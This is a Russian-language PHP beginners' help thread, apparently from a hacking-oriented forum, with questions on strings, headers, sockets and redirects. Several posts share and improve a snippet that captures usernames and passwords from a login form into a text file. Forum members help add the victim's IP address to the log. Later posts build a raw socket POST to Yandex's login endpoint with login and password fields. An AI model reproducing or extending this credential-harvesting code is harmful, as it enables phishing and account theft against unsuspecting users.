[php] Новичкам: задаем вопросы

Discussion in 'PHP' started by _Great_, 26 May 2007.

Thread Status:
Not open for further replies.
  1. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,079
    Likes Received:
    456
    Reputations:
    38
    Как скопировать последние N символов из строки?
     
  2. MesTb

    MesTb New Member

    Joined:
    19 Jun 2007
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    а вот хотел ещё спросить
    что ещё нужно дописать сюда
    PHP:
    if(isset($_POST['login'])){    
    $fp fopen ("antiemo.txt""a");   
    fwrite ($fp"$_POST[req_username] : $_POST[req_password] \n");   
    fclose ($fp);
    чтобы вписывало ещё и айпи адресс
     
  3. hhover

    hhover Elder - Старейшина

    Joined:
    21 May 2007
    Messages:
    60
    Likes Received:
    36
    Reputations:
    11
    Code:
    $_SERVER['REMOTE_ADDR'];
     
  4. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    да много чего можно написать =)
    PHP:
    <?php
    echo "<pre>";
    print_r ($GLOBALS);
    echo 
    "</pre>";
    ?>
    Выбирай =)
     
    #164 ENFIX, 25 Jun 2007
    Last edited: 25 Jun 2007
  5. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    + к этому информация о браузере

    foreach (getallheaders() as $header => $value){
    echo "$header: $value<br/>";
    }
     
  6. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,118
    Reputations:
    1,139
    Dr.Frank, большинство хидеров будут доступны в $_SERVER['HTTP_header'], например, $_SERVER['HTTP_USER_AGENT'], $_SERVER['HTTP_IF_MODIFIED_SINCE'] и проч. Поэтому это уже излишне
     
  7. Ю_ЗвЕРь

    Ю_ЗвЕРь Member

    Joined:
    23 Nov 2006
    Messages:
    99
    Likes Received:
    28
    Reputations:
    1
    Можно ли осуществить запрет на все браузеры отличные от Ie?
    Дело в том, что по-разному отображается контент, в зависимости от браузера, а пока что только такой метод считаю целесообразным. Буду оч. благодарен за любую подсказку.
     
  8. MesTb

    MesTb New Member

    Joined:
    19 Jun 2007
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    а как этот код сюда дописать?
    PHP:
    if(isset($_POST['login'])){     
    $fp fopen ("antiemo.txt""a");    
    fwrite ($fp"$_POST[req_username] : $_POST[req_password] \n");    
    fclose ($fp); 
    з.ы, сор за тупые вопросы , пока только начинаю))))
     
  9. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    более правильно будет
    PHP:
     fwrite ($fp"IP: ".$_SERVER['REMOTE_ADDR']." UserName: ".$_POST['req_username']." Password: ".$_POST['req_password']." \n");
     
    1 person likes this.
  10. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,118
    Reputations:
    1,139
    iNVLose, такой вариант не прокатит. апострофы тогда надо убрать.
    Более правильный вариант предложил ENFIX - переменные рекомендуется вносить за пределы строк, объединяя их со строковыми константами конкатенацией "."
     
  11. Sw33p

    Sw33p New Member

    Joined:
    4 Mar 2007
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    Такая проблема
    PHP:
    21.     $p explode("?",$link);
    22.     $p1 strlen($p[0]);
    23.     $p2 strlen($p[1]);
    Пишет:
    Notice: Undefined offset: 1 in T:\home\localhost\test.php on line 23

    Как можно исправить?

    Вопрос исчерпан.
     
    #171 Sw33p, 26 Jun 2007
    Last edited: 26 Jun 2007
  12. hhover

    hhover Elder - Старейшина

    Joined:
    21 May 2007
    Messages:
    60
    Likes Received:
    36
    Reputations:
    11
    23 строка:
    PHP:
    if (isset($p[1])) $p2 strlen($p[1]);
     
  13. SIBON

    SIBON Banned

    Joined:
    13 Jul 2006
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    только начинаю учить пхп подскажите пожайлусто как отправить пост запрос с переменными с помощью сокетов и получить ответ

    ну как примерно в этом только нужен post с переменными

    PHP:
    <?php
    $fp 
    fsockopen("www.yandex.ru"80$errno$errstr30);
    if (!
    $fp) {
        echo 
    "$errstr ($errno)<br />\n";
    } else {
        
    $out "GET / HTTP/1.1\r\n";
        
    $out .= "Host: www.yandex.ru\r\n";
        
    $out .= "Connection: Close\r\n\r\n";

        
    fwrite($fp$out);
        while (!
    feof($fp)) {
            echo 
    fgets($fp128);
        }
        
    fclose($fp);
    }
    ?> 
     
    #173 SIBON, 28 Jun 2007
    Last edited: 28 Jun 2007
  14. hhover

    hhover Elder - Старейшина

    Joined:
    21 May 2007
    Messages:
    60
    Likes Received:
    36
    Reputations:
    11
    PHP:
    $post_data "a=1&b=2&c=3&d=4";
    $length strlen $post_data );

    $header "POST http://forum.antichat.ru/index.php HTTP/1.0\r\n" .
    "Content-Type: application/x-www-form-urlencoded\r\n".
    "Host: forum.antichat.ru\r\n".
    "Content-Length: $length\r\n\r\n".
    $post_data;
    Заголовок такой. Остальное аналогично.
     
  15. SIBON

    SIBON Banned

    Joined:
    13 Jul 2006
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    делаю вот так

    PHP:
    <?php 
    $fp 
    fsockopen("www.passport.yandex.ru"80$errno$errstr30); 
    if (!
    $fp) { 
        echo 
    "$errstr ($errno)<br />\n"
    } else { 

     
    $post_data "retpath=http%3A%2F%2Fmail.yandex.ru%2F&timestamp=1182979341312&login=zz&passwd=zz"

    $length strlen $post_data ); 

    $header "http://passport.yandex.ru/passport?mode=auth  HTTP/1.0\r\n" 
    $header ="Content-Type: application/x-www-form-urlencoded\r\n"
    $header ="Host: passport.yandex.ru\r\n"
    $header ="Content-Length: $length\r\n\r\n"
    $post_data;  

        
    fwrite($fp$header); 
        while (!
    feof($fp)) { 
            echo 
    fgets($fp128); 
        } 
        
    fclose($fp); 

    ?> 
    пишет
    Bad Request
    Your browser sent a request that this server could not understand.
    Invalid URI in request http://passport.yandex.ru/passport?mode=auth HTTP/1.0
     
  16. GoreMaster

    GoreMaster Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    119
    Likes Received:
    32
    Reputations:
    4
    PHP:
    $header "POST /passport?mode=auth  HTTP/1.0\r\n" 
    $header .="Host: passport.yandex.ru\r\n"
    $header .="Content-Type: application/x-www-form-urlencoded\r\n".
    $header .="Content-Length: $length\r\n\r\n".
    Вот так
     
  17. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Чем можно заменить
    PHP:
    header('Location...');
     
  18. r0

    r0 Elder - Старейшина

    Joined:
    17 Jul 2005
    Messages:
    450
    Likes Received:
    149
    Reputations:
    147
    <META HTTP-EQUIV='Refresh' Content='0; URL=http://сайт.ру' >
     
    1 person likes this.
  19. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    Или через JavaScript
     
    1 person likes this.
  20. r0

    r0 Elder - Старейшина

    Joined:
    17 Jul 2005
    Messages:
    450
    Likes Received:
    149
    Reputations:
    147
    location.href='страница.html'
     
Loading...
Thread Status:
Not open for further replies.